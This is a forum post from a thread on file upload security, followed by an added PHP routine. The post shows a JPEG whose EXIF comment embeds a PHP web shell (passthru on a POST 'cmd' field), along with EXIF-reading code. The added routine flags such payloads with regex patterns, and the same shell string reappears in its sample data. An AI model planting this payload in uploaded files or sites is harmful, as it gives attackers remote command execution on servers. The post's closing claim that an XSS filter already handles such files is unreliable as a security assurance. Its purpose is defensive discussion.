File Upload tips/tricks/best practice (in regards to security VS usability).
#5

LuckyFella73
I did some research about embedded image meta data and found an example
of an "infected" file:
Code:
File name    : image.jpg
File size    : 182007 bytes
File date    : 2011:09:07 21:20:10
Resolution   : 1197 x 478
Comment      : <?php passthru($_POST['cmd']); __halt_compiler();

Using an example from php.net we can read the meta data like this:
Code:
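// Method of a controller or library class: prints every EXIF field of an image.
public function display_exif_data($full_path)
{
  $exif = exif_read_data($full_path, 0, true);
  if ($exif === false)
  {
   return; // no readable EXIF data in this file
  }

  foreach ($exif as $key => $section)
  {
   foreach ($section as $name => $val)
   {
    // Some tags hold arrays; render them as text so echo does not print "Array".
    $val = is_array($val) ? print_r($val, true) : $val;
    // Metadata comes from the uploader, so escape it before writing it into HTML.
    echo htmlspecialchars("$key.$name: $val") . "<br />\n";
   }
  }
}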

Instead of echoing the meta data we could check the keys and values against some kind
of blacklist. Don't know if that is a naive approach but I guess that way we
can at least lower the risk.

What do you think?


EDIT: the CI security class (xss_clean()) already takes care of this so never mind ...
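
The blacklist check proposed in the post, as an added example that is not part of the original thread: it walks an array shaped like the output of exif_read_data($path, 0, true) and reports every value matching a pattern that should not appear in image metadata. The pattern list, the function name find_suspicious_metadata() and the sample array are assumptions constructed for illustration.

```php
<?php
// Added example, not code from the thread. Names and patterns are assumptions.

// Markers that have no place in image metadata (illustrative, not exhaustive).
const SUSPICIOUS_PATTERNS = [
    'php_open_tag'  => '/<\?(php|=)/i',
    'halt_compiler' => '/__halt_compiler\s*\(/i',
    'script_tag'    => '/<script\b/i',
];

/**
 * Walk an array shaped like exif_read_data($path, 0, true) and return
 * one finding per metadata value that matches a pattern.
 */
function find_suspicious_metadata(array $exif, string $prefix = ''): array
{
    $findings = [];
    foreach ($exif as $name => $val) {
        $path = $prefix === '' ? (string) $name : "$prefix.$name";
        if (is_array($val)) {
            // Sections and multi-valued tags nest, so recurse into them.
            $findings = array_merge($findings, find_suspicious_metadata($val, $path));
            continue;
        }
        foreach (SUSPICIOUS_PATTERNS as $label => $regex) {
            if (preg_match($regex, (string) $val)) {
                $findings[] = ['field' => $path, 'pattern' => $label];
            }
        }
    }
    return $findings;
}

// Constructed sample mirroring the "infected" file shown in the post.
$sample = [
    'FILE'     => ['FileName' => 'image.jpg', 'FileSize' => 182007],
    'COMPUTED' => ['Width' => 1197, 'Height' => 478],
    'COMMENT'  => ["<?php passthru(\$_POST['cmd']); __halt_compiler();"],
];

foreach (find_suspicious_metadata($sample) as $hit) {
    echo "reject upload: {$hit['field']} matches {$hit['pattern']}\n";
}
```

A pattern list like this only catches the markers it names, so it lowers the risk, as the post puts it, and does not show that a file is clean.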


Messages In This Thread
File Upload tips/tricks/best practice (in regards to security VS usability). - by El Forum - 11-13-2012, 06:51 AM


